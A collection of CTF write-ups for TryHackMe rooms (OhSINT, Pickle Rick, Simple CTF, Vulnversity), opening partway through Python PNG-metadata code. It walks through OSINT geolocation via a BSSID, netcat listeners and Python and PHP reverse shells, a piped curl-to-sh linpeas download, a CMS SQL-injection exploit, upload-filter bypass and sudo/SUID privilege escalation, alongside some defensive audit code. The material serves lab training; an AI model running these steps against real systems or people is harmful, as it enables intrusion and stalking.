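    idat = zlib.compress(b"\x00\x00\x00\x00")  # one scanline: filter byte + one RGB pixel
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for key, value in text_fields.items():
        png += _chunk(b"tEXt", key.encode("latin-1") + b"\x00" + value.encode("latin-1"))
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, rejecting truncation and CRC mismatches."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos < len(png):
        if pos + 12 > len(png):
            raise ValueError(f"truncated chunk header at offset {pos}")
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(png):
            raise ValueError(f"truncated {ctype!r} chunk at offset {pos}")
        data = png[pos + 8:end]
        (crc,) = struct.unpack(">I", png[end:end + 4])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on {ctype!r} chunk at offset {pos}")
        yield ctype, data
        pos = end + 4
        if ctype == b"IEND":
            break


def text_metadata(png: bytes) -> dict:
    """Return keyword -> text for tEXt, zTXt and iTXt chunks."""
    found = {}
    for ctype, data in iter_chunks(png):
        if ctype not in TEXT_CHUNKS:
            continue
        key, _, rest = data.partition(b"\x00")
        if ctype == b"tEXt":
            found[key.decode("latin-1")] = rest.decode("latin-1")
        elif ctype == b"zTXt":
            # rest[0] is the compression method (0 = deflate), then compressed text
            found[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        else:  # iTXt: compression flag, method, language tag\0, translated keyword\0, text
            compressed = rest[0] == 1
            _, _, rest = rest[2:].partition(b"\x00")
            _, _, body = rest.partition(b"\x00")
            text = zlib.decompress(body) if compressed else body
            found[key.decode("latin-1")] = text.decode("utf-8")
    return found


def strip_text_metadata(png: bytes) -> bytes:
    """The publisher's fix: rebuild the file without any text chunks."""
    out = PNG_SIGNATURE
    for ctype, data in iter_chunks(png):
        if ctype not in TEXT_CHUNKS:
            out += _chunk(ctype, data)
    return out


if __name__ == "__main__":
    sample = build_sample_png({"Copyright": "OWoodflint"})
    print("metadata:", text_metadata(sample))
    print("after strip:", text_metadata(strip_text_metadata(sample)))
```

Note that this covers PNG text chunks only; JPEG carries the same kind of information in EXIF and XMP segments, which is what ExifTool abstracts away. The CRC check is not decoration: a parser that trusts the length field without it will happily read past a corrupted chunk, which is how malformed-image bugs start.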


Searching for OSINT

We see OWoodflint as the copyright holder for the image we downloaded. Let's look this up on Google.

The first result is this Twitter account.

twitter home

The first question asks what the user's avatar is; putting in cat is the correct answer.

What city is this person in?

The twitter account has two posts, one of which says:
From my house I can get free wifi ;D Bssid: B4:5D:50:AA:86:41 - Go nuts!

The term BSSID is used to describe a section of a wireless network (WLAN); it stands for Basic Service Set Identifier. Basically, it is the MAC address of the access point. It is a way of identifying access points and their associated clients. You can get more information here.

This can be used to find the location of the WLAN. A website called wigle.net "consolidates location and information of wireless networks world-wide to a central database."

wigle

We can put the BSSID in wigle and find a location in London.

What's the SSID of the WAP he connected to?

By creating an account, we can search for the BSSID and find the SSID of the WAP. We see the result shown is UnileverWiFi.

wapSSID

What is his personal email address?

So, we have basically got all we could out of the BSSID; let's look for another method of finding this person's email address.

Our best tool is actually Google. We still have that username, owoodflint. Doing a simple Google search of this also brings up his GitHub. This has his email.

github

What site did you find his email address on?

We found it on GitHub! See the previous question above.

Where has he gone on holiday?

There isn't much else on his GitHub; we may return there later, but for now let's examine what other accounts we can find using Google.

OH! We see a WordPress blog.

wordpress

It says they are in New York right now, but we know that they live in London. So this must be where they are on vacation.

What is this persons password?

This was a tough one, admittedly. I kept google dorking this dude's name in different ways, and was having trouble finding anything useful. (BTW I will give a big google dork hint to help you get less garbage in your google searches during a CTF at the end of this page)

Anyway, I looked back at the original google search of owoodflint and found something that stuck out to me. Take a look and see if you can spot it too.

googlesearch

Did you see it? Look at the description of the first result. What is that word, "pennYDr0pper"? I don't remember seeing anything that ludicrous on the page! Let's take a closer look at the blog.

blog

It's not on the page, that we can see. But the word came right after the word "photos!" in the Google search result description.

Let's try highlighting all the text with ctrl + A.

highlighted text

There it is! It looks to be the same format as our text input should be on the TryHackMe page, and it works as our password.

Also, for you dorks out there inspecting the source, you can find it there too.

source


And that's all! But wait...

If you looked closely at my search before, you may have seen it look a little weird:

search

This is an example of what's called a Google dork. Google dorking, or Google hacking, is a technique for finding open-source intelligence on Google. You can modify your Google search to become more or less restrictive through Google dorking.

For example, in the picture I put -tryhackme. This is because a lot of the search results I would get when searching the phrase oliver woodflint or owoodflint would bring up writeups for the TryHackMe challenge that I was in the middle of doing. This is annoying to sift through, and can waste time figuring out what result is a writeup and what result is legitimate.

So, when you put a - sign directly in front of a phrase in a google search, it tells google to hide any results with that phrase. So my -tryhackme took all the results that had the word tryhackme in it and threw them in the trash. You can also put stuff like -osint, -OhSINT (the name of the challenge), -writeup in the google search to really get rid of all the writeups and keep it only to the content that the CTF author intended to show up (plus maybe one or two legitimate people or businesses named Oliver Woodflint)

Have fun, and good luck on your OSINT adventures!

🙂

Pickle Rick


TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 31 July 2021

Room Link

Github Link


Task 1: Pickle Rick

With this box, we are given nothing but an IP address and 3 questions, each asking the name of 1 ingredient that Rick needs. So let's begin.

The First Ingredient

Let's start poking at this IP address we have and see what comes up.

Running the nmap command: nmap -sC -sV -O -oN nmap.txt <IP> gives us the following

nmap

Let's break this nmap command down:

  • nmap - Tells Linux to run an nmap scan
  • -sC - Runs default scripts
  • -sV - Probes open ports to determine service/version info
  • -O - Enables OS detection
  • -oN nmap.txt - Outputs the scan in the normal format to the file nmap.txt
  • 10.10.55.186 - The IP address of our box

The output tells us that there are two services running: SSH and HTTP.

Since we know there is a web service, I will start up gobuster, a tool for enumerating the directories of a website. I will go over the details later, but while that is running in the background, lets take a look at the website.


website home

There isn't much to it. A picture and some unassuming text. Taking a look at the page source (on firefox, right-click, then select View Page Source) we can find a username: R1ckRul3s.

website home viewing source

Nice! Our first half of a set of credentials (still need the password.) Make sure you write this down for later.

Let's see if there is a robots.txt page. Oh, I should probably explain what that is. Google's developer documentation says that a robots.txt page "tells search engine crawlers which URLs the crawler can access on your site. It is used mainly to avoid overloading your site with requests." Cool! So basically, instead of a robot on the internet having to check every single page your website has to see if it can access it, it can look at the robots.txt page to see where it is allowed to go, saving your website the overhead.

If we navigate to /robots.txt on our web browser, all we get is the text: Wubbalubbadubdub

Not too interesting, but, like any text that stands out, you should write it down and see if it does anything interesting later.


Lets go back to our gobuster results.

gobuster

2 results, /assets and /server-status, both of which aren't very interesting. I will let you explore them as you wish.

For now, I will explain what gobuster is, the input, and how to interpret the output. Gobuster is a tool that enumerates directories on a web server. Basically, when you are given an IP address, if you type it into the address bar on the top of a web browser, it takes you to that website's home page. There are often times other pages within that web server address, that can be found by putting a / character after the IP address (1.2.3.4/robots.txt or 14.32.122.34/assets.)

gobuster dir -u http://10.10.74.255 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

Let's break down this command:

  • gobuster - the command to run the gobuster program
  • dir - Run in directory mode, because we are enumerating web server directories
  • -u http://10.10.74.255 - Gives the url to gobuster
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - Gives the wordlist to run against the URL. If you have Kali Linux, the /usr/share/wordlists directory is an amazing directory that contains a whole bunch of wordlists to use for many different things. The dirbuster/directory-list-2.3-medium.txt is a good one to use for gobuster directory enumeration.
  • | - Pipes the output into the following command
  • tee - This command takes the output and both shows it on the terminal screen (which is called standard output) and saves the output to a file of your choice
  • gobuster.txt - The name of the file to save the gobuster results to

On the bottom of the gobuster output, you see /assets and /server-status which are the directories the program found.


I also ran nikto on the IP address to look for any known vulnerabilities. The output revealed something interesting...

nikto

An admin login page called /login.php. Let's explore this.


login

Nice!! A login page. We know from earlier that a valid username should be R1ckRul3s. The only other information we have gathered so far was that random Wubbalubbadubdub from the robots.txt page. Let's try that out.


command panel

Awesome, it brought us to a new page, Command Panel. Given this is a command panel, if we try the command ls, it outputs a list of files.

trying ls command in command panel

Here, we see one file in particular, Sup3rS3cretPickl3Ingred.txt. Trying the cat command to read it doesn't work; the command has been disabled. Trying head also doesn't work, but less works!

less ingredientfile command panel

Our first ingredient is mr. meeseek hair


The Second Ingredient

Since this is a command panel, and it clearly runs Linux commands, let's see if we can run a reverse shell script on it.

First, open a new tab on your terminal and run the command:

nc -lvnp 1234

This tells netcat to:

  • -l - listen for inbound connections
  • -v - verbose
  • -n - numeric-only IP addresses, no DNS
  • -p - specify the port to listen on

So now netcat is listening on port 1234 for connections coming into it. The connection would have to come into our openvpn IP address.

nc listening

We can find our openvpn IP address with the command: ip a s

ip

The ip address we want to use for our reverse shell is tun0 (in my case, 10.6.77.21)

Going back to the command panel, let's see if we have access to python3. Typing python3 --version gives us a response with the version number, so we know we can use python3. Head over to the Pentest Monkey cheatsheet to grab the Python reverse shell. (BTW, Pentest Monkey is an amazing resource for spawning a reverse shell when you have a command execution vulnerability, which is exactly what the command panel we have been using is.)

Throw this line of code into Sublime or vim to edit it; we need to change the version of Python we are using and the IP address:

  • Change [python] -> [python3] - this is because we don't know if we have python, but we know we have python3.
  • Change [10.0.0.1] -> [your tun0 IP address we got before] - This sends the connection to that IP address, which netcat is listening to. The port number (1234) can stay the same because netcat is listening to that port number, but if you chose a different one during the netcat setup, make sure you change the port in the reverse shell code to the one you picked.

Throw that new line of code into the command execution panel and run it. Going back to our netcat, we see that we are on!

netcat connected to reverse shell


Let's explore this shell a little bit.

Running whoami tells us we are www-data. pwd tells us we are in /var/www/html. We can read the clue.txt file and we get back "Look around the file system for the other ingredients", so let's go do that.

Heading into the /home directory we see two users: rick and ubuntu.
The rick directory has just one file: second ingredient. Reading it gives us 1 jerry tear!!!! That is our second ingredient 🙂


The Third Ingredient

So, we got basically all we need from the rick directory; what about checking out that /root directory? If you try, you can see that you aren't allowed in. This is because we don't have root privileges to get into that directory. Let's try and change that.

Typing sudo -l will tell us what commands the current user (www-data) is allowed (and forbidden) to run.

sudo l

The bottom shows that www-data may run (ALL) NOPASSWD: ALL, meaning that we can run nearly any command as sudo without a password. Knowing this, typing sudo -i will run a new shell as root, giving you that root access that we needed before.

sudo i

From here, we can find the flag in the /root directory and read it for the last ingredient: fleeb juice

flag


And that is really all there is! As you can see, sometimes sudo -l can reveal that you can run virtually any command with sudo, which is a horrible mistake on the part of whoever manages the system's security, but great for you. Happy hacking!

🙂

Simple CTF


TO SEE THIS WRITE-UP WITH ALL IMAGES, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 11 August 2021

github.com/Armand-Alvarez

Room link on TryHackMe


Since this is a simple room, we will go through the questions and I will show my thought process and work to solve each question.

How many services are running under port 1000?

To figure this out, we need to run a specific nmap command:

nmap

Let's go over this command:

sudo nmap 10.10.127.163 -p1-1000 -T5 -oN nmap.txt

  • sudo nmap 10.10.127.163 - Runs nmap as a superuser on IP 10.10.127.163 (this was the IP of the box I needed to get into)

  • -p1-1000 - Scan ports 1-1000 (the first 1000 ports)

  • -T5 - Run the fastest scan you can (1 is slowest, 5 is fastest)

  • -oN nmap.txt - Put normal-output in the file nmap.txt

We see that there are 2 ports open in the first 1000: port 21 and port 80!


What is running on the higher port?

We only see 2 ports with our small 1-1000 scan, but if we run a larger scan we may see more information.

big nmap

Running our scan with -sC and -sV, we see an additional port, 2222, running ssh.

What's the CVE you're using against the application?

If we go to the ip address on a web browser, we are just greeted with the default Apache2 page.

home

Running gobuster reveals /simple. Let's check it out.

simple

This is more interesting! Exploring the page also reveals the CMS version:

simple version

Let's search this version on ExploitDB to see if it reveals anything.

Searchsploit is a Kali command that searches the exploits from ExploitDB offline. We searched for the keywords cms, 2.2.8, made, and simple. It revealed an SQLi:

searchsploit

Running the same command with the -w argument will also show the exploit-db url, which will reveal the CVE number:

cve

Looks like we are using CVE-2019-9053.


To what kind of vulnerability is the application vulnerable?

We know this is SQLi, an SQL injection.


What's the password?

To use the exploit, let's copy it into the current working directory. (I recommend making a separate directory for each TryHackMe room you do.)

Our original searchsploit result gave part of the path: php/webapps/46635.py.

We can run the following command to copy it to the current working directory:

sudo cp /usr/share/exploitdb/exploits/php/webapps/46635.py exploit.py

The exploit database is kept in /usr/share for Kali Linux users; we know it is an exploit from our searchsploit results, and the rest of the path was given to us. I saved it as exploit.py in my directory.

Now let's try running the exploit:

exploit

If you type in python2 ./exploit.py, it prints example usage of the exploit, which is how I knew what command to run.

We see that the password is secret


Where can you login with the details obtained?

We can log into the FTP server as anonymous and download the only file in it. It contains nothing important, so we don't need the login details there.

Trying ssh, we need a username and password; let's try Mitch and our newly obtained password.

ssh mitch@10.10.127.163 -p 2222 - remember we have to use port 2222 because ssh is not running on port 22 on this box. Using the password we got earlier, we can successfully log in.

ssh

That shows us that the password can be used with ssh.


What's the user flag?

We can see one file in the directory we start in, which is Mitch's home directory. Reading the file gives us the flag: G00d j0b, keep up!

user flag


Is there any other user in the home directory? What's its name?

If you do ls /home, you can see another user named: sunbath


What can you leverage to spawn a privileged shell?

If you run the command sudo -l, it will show you what the user can run as root, and whether it requires a password:

sudo -l command

This shows us that Mitch may run /usr/bin/vim (Vim) without a password.


What's the root flag?

Head over to GTFOBins, a great list of Unix binaries that can be used for privilege escalation. Type "vim" into the search bar (because we know vim can be run as superuser) and click on "Sudo".

vim sudo

Run this command on the ssh shell and you will become root:

becoming root

Congrats! You are now root simply because of a misconfigured vim.
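The sudo -l findings in this room and in the Rick and Morty room above (NOPASSWD: ALL for www-data, NOPASSWD vim for mitch) are the kind of thing a defender wants to catch before a CTF player does. The following added example, which is my own code and not part of the write-up, parses the "may run" block of sudo -l output and flags unrestricted rules and shell-capable binaries; the sample output, the hostnames and the SHELL_CAPABLE set are constructed assumptions (a small subset of what GTFOBins lists).

```python
import re

# Constructed `sudo -l` output modelled on the two rooms above (www-data with
# "(ALL) NOPASSWD: ALL", mitch with NOPASSWD vim). Not captured from a real box.
SAMPLE_WWW_DATA = """\
Matching Defaults entries for www-data on ip-10-10-74-255:
    env_reset, mail_badpass

User www-data may run the following commands on ip-10-10-74-255:
    (ALL) NOPASSWD: ALL
"""
SAMPLE_MITCH = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
"""

# Binaries that can spawn a shell or write arbitrary files when run as root.
# A small hand-picked subset of the GTFOBins list, used here as an assumption.
SHELL_CAPABLE = {"vim", "vi", "less", "more", "find", "awk", "env", "bash", "sh",
                 "python", "python3", "perl", "systemctl"}

# One sudo rule line looks like: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return (severity, message) findings for one user's `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header and Defaults lines never start with "("
        suffix = " without password" if "NOPASSWD" in m.group("tags") else ""
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                findings.append(("critical", f"unrestricted sudo as ({m.group('runas')}){suffix}"))
            elif cmd.split()[0].rsplit("/", 1)[-1] in SHELL_CAPABLE:
                findings.append(("high", f"{cmd} can give a root shell (see GTFOBins){suffix}"))
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_WWW_DATA, SAMPLE_MITCH):
        print(audit_sudo_l(sample))
```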

root

The flag is W3ll d0n3. You made it!!

Happy hacking 🙂

Vulnversity


Armand Alvarez | 17 July 2021


Task 1: Deploy the machine

Task 2: Reconnaissance

Nmap scan

First let's perform an nmap scan!

21 - ftp - vsftpd 3.0.3
22 - ssh - OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139 - netbios-ssn - Samba smbd 3.x - 4.x
445 - netbios-ssn - Samba smbd 4.3.11-Ubuntu
3128 - http-proxy - Squid http proxy 3.5.12
3333 - http - Apache httpd 2.4.18

Questions

  • Scan the box, how many ports are open?
    6

  • What version of the squid proxy is running on the machine?
    3.5.12

  • How many ports will nmap scan if the flag -p-400 was used?
    400
    • This does a port scan of ports 1 - 400

  • Using the nmap flag -n what will it not resolve?
    DNS

  • What is the most likely operating system this machine is running?
    Ubuntu
    • Found on smb-os-discovery

  • What port is the web server running on?
    3333
    • The port with the http service

Task 3: Locating directories using GoBuster

So, since we know that there is an http service on port 3333, we can try to bust, or brute force, the names of the directories using a really cool tool called GoBuster.

Command Breakdown

Let's break down our command real quick and what we are looking at:

gobuster dir -u http://10.10.99.117:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

  • gobuster dir -- Directs gobuster to work in directory enumeration mode
  • -u http://10.10.99.117:3333 -- Tells gobuster to scan our box (that is the IP of the box we are trying to get into for me, it may be different when you do this CTF.) The :3333 tells gobuster to use port 3333 (by default it uses port 80)
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -- Specifies the wordlist to use when enumerating possible directories. This is a pretty good wordlist that comes installed stock in Kali Linux.

Output Breakdown

We see that our ip address has the directories:

  • /images
  • /css
  • /js
  • /fonts
  • /internal

The /internal directory looks interesting....

Questions

  • What is the directory that has an upload form page?
    /internal/

Task 4: Compromise the webserver

Let's see what the internal page looks like...

We can upload a file and submit it. But it looks like this does NOT work with .pl files. Instead of manually trying a bunch of different file types, we can use BurpSuite to do this automatically.

Turn on your Burp proxy and send the .pl file so that it gets rejected.

Then send that POST request to the intruder.

Under the Intruder->Positions tab, select the file extension. We do this because all we are enumerating is which file extension is allowed; we don't actually care about the contents of the file at this point.

Under the Intruder->Payload Options, put a list of common extension types like .php, .php5, .phtml, etc.

** Make sure you un-check "URL-encode these characters", otherwise it won't work.

Looking at the results, the .phtml extension works!
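The reason the Intruder run above finds .phtml is that the upload form rejects a short denylist of extensions rather than accepting a short allowlist. The following added example is my own code, not the room's upload handler: it models the observed denylist beside a hardened allowlist check, and replays the same extension probe against both. The BLOCKED and ALLOWED sets are constructed assumptions.

```python
import os

# Denylist modelled on the behaviour observed above: ".php" and ".pl" are
# rejected, everything else reaches /uploads. Constructed, not the room's code.
BLOCKED = {".php", ".pl"}


def denylist_allows(filename):
    """The weak check: refuse only the listed extensions."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED


# Hardened form: a short allowlist of non-executable types, exactly one
# extension (so "shell.phtml.jpg" is refused) and no path separators or NULs.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def allowlist_allows(filename):
    """The hardened check: accept only a known-good single extension."""
    if any(ch in filename for ch in "/\\\x00"):
        return False
    stem, dot, ext = filename.lower().partition(".")
    if not stem or not dot or "." in ext:
        return False
    return "." + ext in ALLOWED


def probe_extensions(checker, extensions, stem="shell"):
    """Replay the Intruder-style extension probe; return the extensions accepted."""
    return [e for e in extensions if checker(stem + e)]


# The payload list from the walkthrough plus two more PHP-handled extensions.
PROBE = [".pl", ".php", ".php5", ".phtml", ".phar", ".jpg"]

if __name__ == "__main__":
    print("denylist accepts:", probe_extensions(denylist_allows, PROBE))
    print("allowlist accepts:", probe_extensions(allowlist_allows, PROBE))
```

An extension check alone is not a complete fix; the uploads directory should also be served without a PHP handler so that whatever slips through cannot execute.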

Now let's upload a PHP reverse shell.

First, download the reverse shell provided

Secondly, open a netcat connection to port 1234

nc -lvnp 1234

After making the changes that the TryHackMe page recommends, you can upload the shell to the page. Navigate to /uploads to see your file, then click it to form the connection!

Exploring

We can explore the webserver a little bit for some more information.

Typing whoami will show that we are logged in as www-data

Looking in the home directory will show only one user: Bill. He probably owns this webserver...

He only has one file in his directory. Probably the flag...

Questions

  • Try upload a few file types to the server, what common extension seems to be blocked?
    .php.

  • Run this attack, what extension is allowed?
    .phtml

  • What is the name of the user who manages the webserver?
    bill

  • What is the user flag?
    8bd7992fbe8a6ad22a63361004cfcedb


Task 5: Privilege Escalation

linpeas

I solved this a little differently from the THM page.

First, I downloaded the linpeas.sh file from their website (you can google linpeas to find the github page, just click on the linpeas.sh file and download the raw file as linpeas.sh)

Second, on another terminal tab, type python -m SimpleHTTPServer 80
This starts an HTTP server on your IP, serving the directory you ran it from.

Then, back in your webserver netcat connection, type curl http://<your ip>/linpeas.sh | sh
This will download the linpeas file from the directory you started the HTTP server from and run it on the box.

The results tell us a lot of options we can use for privilege escalation, but one of them sticks out.

By having systemctl under SUID, we can use that to escalate privileges because we can run it as root despite not having root access.

Privilege Escalation

Let's follow the process here to take advantage of the misconfigured systemctl.

Once you create and upload your root.service file, execute it to become root!

You should be able to find the last flag 😉